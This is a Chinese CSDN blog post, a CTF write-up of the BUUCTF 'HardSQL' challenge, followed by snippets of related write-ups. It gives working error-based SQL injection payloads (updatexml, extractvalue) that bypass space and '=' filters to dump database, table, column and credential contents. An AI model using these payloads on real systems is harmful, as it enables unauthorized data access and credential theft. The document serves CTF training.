Buuctf-[极客大挑战 2019]HardSQL

最新推荐文章于 2024-07-30 17:12:16 发布
最新推荐文章于 2024-07-30 17:12:16 发布
阅读量310 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/130126683
版权

看题:

 

一路做到这里我们对这个题已经很熟悉了,我还是按照习惯,在密码栏注:

用户名:admin

密码:1'

我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入

1' or 1=1#它回显:

空格被过滤了 ,怎样绕过呢?()绕过:

括号是来包含子查询的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格

我来试一下:输入1'(or)#

发现绕过成功了,接下来可以构造查询了,需要注意的是,等号=是被过滤了,但是like可以平替:

首先,数据库查询:

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

报错注入回显嘛,直接获取数据库名“geek”

接下来,查询数据表:

1'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

查询表内列名:

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

id,username,password。看到这些,已经基本胜利了:

接着查询username和password中的内容:

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

看到没,flag已经出现,但是显示不全:flag{f166c87a-0f0e-4498-,要使用到right语句:

1'or(updatexml(1,concat(0x7e,(select(right(password,21))from(H4rDsq1)),0x7e),1))#

 又得到了:98-8e23-3728c2f96a1d}

 

拼接一下flag,把重复部分删咯,就可以成功提交。 下面贴上笔记:

 

7ig3r
关注
微信小程序-极客学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
极客挑战2019Hard SQL注入解题
Bird&Bird
10-26 1318
1、打开BUUCTF在线评测,选择web----->【极客挑战2019HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
[极客挑战 2019]HardSQL
pakho_C的博客
02-08 2447
web第24题 [极客挑战 2019]HardSQL 打开靶场 首先尝试使用单引号 显然页面存在sql注入的 永真式进行登陆 继续尝试order by爆字段 那么说明很多字符都被过滤了 尝试双写进行绕过 依旧是不行 看了很多人的wp,他们都没说清楚如何知道对哪些关键字进行了过滤,直接给出了,我也不知道怎么来的 直接使用burpsuite对其进行fuzz,观察过滤了哪些关键字 参考:利用burpsuit对xss和sql注入进行fuzz 抓包发送至intruder模块 设置payload,
BUUCTF [极客挑战 2019]HardSQL
CrotZZ的博客
07-08 236
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3170
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1463
buucft记录贴
极客挑战2023 ez-fullprotection
11-22
附件
极客标记:极客标记-极客标记系统
02-03
极客标记-极客标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
微信小程序-- 极客学院
04-02
在这个“微信小程序-- 极客学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
微信小程序实验源码-极客学院 v1.0
12-02
微信小程序实验源码-极客学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,特色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片...
极客挑战2019-hardsql
最新发布
lht2004的博客
07-30 676
报表名 1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#报数据 1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
【CTF】BUUCTFCrypto 部分题解(持续更新)
Rm_mR的博客
04-25 1388
【CTF】Buuctf Crypto 部分题解(持续更新)
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1762
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
[BUUCTF]HardSQL(writeup)
weixin_63306244的博客
06-22 243
这是因为extractvalue函数限制了一次字符串只能输出32位。所以就用常用的" like "和" () "来绕过。发现select、ascii、空格、=等被过滤。输入admin / 2'or'1。使用bp试试看过滤了哪些东西。因为“=”、“空格”被过滤了。sql注入题进入后直接惯例。就确定了需要用报错注入来做。由此类推下去得到下一句语句。他只给了你前半段的flag。得到数据库名后构造下一句。这是为什么,那该怎么办呢。但是当你输入后会发现。再加上之前页面的报错。
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 275
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
buuctf-HardSQL
m0_62094846的博客
04-02 1422
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
buuctf-web-[极客挑战 2019]HardSQL-wp
居上
08-09 307
[极客挑战 2019]HardSQL 知识点 绕过一些简单的过滤 right() 过程 主页是一个登陆页面 过滤了关键字 and、=、空格、union等 查库 check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 查表 check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值